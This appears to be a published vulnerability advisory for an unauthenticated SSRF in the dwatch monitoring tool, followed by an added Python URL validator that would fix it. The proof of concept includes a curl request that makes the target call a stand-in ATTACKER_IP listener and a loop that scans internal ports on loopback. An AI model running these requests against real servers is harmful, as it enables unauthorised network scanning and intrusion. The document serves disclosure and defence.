# Exploit Title: dwatch 0.0.2 - Unauthenticated SSRF via Task URL
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Software: https://github.com/dhjz/dwatch
# Vendor: https://github.com/dhjz/dwatch
# Version: Latest
# Tested on: Linux
# Description:
dwatch is a website monitoring tool that allows unauthenticated users to create
monitoring tasks via the /api/task/save endpoint. The 'url' parameter accepts
arbitrary URLs and the server makes HTTP requests to them. This Server-Side
Request Forgery (SSRF) vulnerability allows attackers to:
1. Scan internal network services
2. Access internal HTTP endpoints
3. Bypass firewall restrictions
4. Exfiltrate data to external servers
# Proof of Concept:
1. Set up a listener on the attacker machine:
nc -lvnp 8888
2. Create a malicious task:
curl -X POST "http://TARGET:3457/api/task/save" \
  -H "Content-Type: application/json" \
  -d '{"name":"SSRF PoC","url":"http://ATTACKER_IP:8888/ssrf","spec":"*/5 * * * * *"}'
3. The target makes a request to the attacker's server, confirming the SSRF.
# Internal Network Scanning PoC:
for port in 22 80 443 3306 5432 6379 8080 3457; do
  curl -X POST "http://TARGET:3457/api/task/save" \
    -H "Content-Type: application/json" \
    -d "{\"name\":\"scan_$port\",\"url\":\"http://127.0.0.1:$port\",\"spec\":\"*/10 * * * * *\"}"
done
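A server-side check that would close this hole, added here as an example and not code from dwatch: it accepts only http(s) task URLs whose host resolves exclusively to public addresses, so loopback, RFC 1918 and link-local targets like the ones in the PoC are refused before any request is made. Function names and the SAMPLE_DNS table are assumptions constructed so the check can run offline.

```python
# Added example (not dwatch code); names assumed, SAMPLE_DNS constructed.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed DNS answers so the check runs offline (real use: system_resolver).
SAMPLE_DNS = {
    "monitor.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "db.internal": ["10.0.0.5"],
    "mixed.example": ["93.184.216.34", "127.0.0.1"],  # one public, one loopback
}

def sample_resolver(host):
    if host not in SAMPLE_DNS:
        raise socket.gaierror("unknown host (constructed resolver)")
    return SAMPLE_DNS[host]

def system_resolver(host):
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_public_address(addr):
    """Globally routable unicast only: no loopback, RFC 1918, link-local, etc."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 would otherwise hide loopback
    return ip.is_global and not ip.is_multicast

def validate_task_url(url, resolver=system_resolver):
    """Return (ok, reason); ok only if http(s) and every address is public."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False, "malformed URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return False, "scheme not allowed or missing host"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal: no DNS lookup
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, "host does not resolve"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"non-public address {addr}"
    return True, "ok"
```

Resolve once and connect to the address you checked, otherwise a DNS answer can change between validation and the scheduled fetch.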